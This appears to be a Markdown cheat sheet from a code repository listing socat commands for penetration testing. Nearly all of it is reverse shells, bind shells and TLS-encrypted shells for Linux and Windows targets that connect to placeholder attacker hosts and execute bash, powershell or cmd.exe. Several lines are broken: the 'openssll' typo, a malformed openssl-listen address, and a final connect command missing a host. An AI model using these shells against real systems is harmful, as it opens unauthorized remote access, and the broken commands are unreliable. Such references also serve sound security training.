101 lines
1.6 KiB
Markdown
101 lines
1.6 KiB
Markdown
# socat cheat sheet
|
|
|
|
## Reverse Shell
|
|
|
|
### reverse shell listener
|
|
|
|
```sh
|
|
socat tcp-l:<port> -
|
|
```
|
|
|
|
```sh
|
|
socat TCP-L:<PORT> file:`tty`,raw,echo=0
|
|
```
|
|
|
|
### windows target
|
|
|
|
```sh
|
|
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes
|
|
```
|
|
|
|
### linux target
|
|
|
|
```sh
|
|
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
|
|
```
|
|
|
|
## Bind Shell
|
|
|
|
### generic connect
|
|
|
|
```sh
|
|
socat TCP:<TARGET-IP>:<TARGET-PORT> -
|
|
```
|
|
|
|
### windows target listener
|
|
|
|
```sh
|
|
socat TCP-L:<PORT> EXEC:powershell.exe,pipes
|
|
```
|
|
|
|
### linux target listener
|
|
|
|
```sh
|
|
socat TCP-L:<PORT> EXEC:"bash -li"
|
|
```
|
|
|
|
## Connect from statically compiled socat to LHOST
|
|
|
|
Binary is inside this dir
|
|
```sh
|
|
socat TCP:<ATTACKER-IP>:<ATTACKER-PORT> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
|
|
```
|
|
|
|
## Encrypted Shell
|
|
|
|
### create key + cert
|
|
|
|
```sh
|
|
openssll req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 365 -out shell.crt
|
|
```
|
|
|
|
### create pem file
|
|
|
|
```sh
|
|
cat shell.key shell.crt > shell.pem
|
|
```
|
|
|
|
### reverse shell listener
|
|
|
|
```sh
|
|
socat openssl-listen:<port>,cert=shell.pem,verify=0 -
|
|
```
|
|
|
|
```sh
|
|
socat openssl-listen:<port>,cert=shell.pem,verify=0 file:`tty`,raw,echo=0
|
|
```
|
|
|
|
### connecting shell on target to listener
|
|
|
|
```sh
|
|
socat openssl:<attacker-ip>:<attacker-port>,verify=0 exec:/bin/bash
|
|
```
|
|
|
|
```sh
|
|
socat openssl:<attacker-ip>:<attacker-port>,verify=0 exec:"bash -li",pty,stderr,sigint,setsid,sane
|
|
```
|
|
|
|
### encrypted bind shell on windows listening
|
|
|
|
Target:
|
|
|
|
```sh
|
|
socat openssl-listen:<local-ip>:<local-port>,verify=0 exec:cmd.exe,pipes
|
|
```
|
|
|
|
### encrypted bind shell attacker connecting
|
|
|
|
```sh
|
|
socat openssl:<port>,cert=shell.pem,verify=0 -
|
|
```
|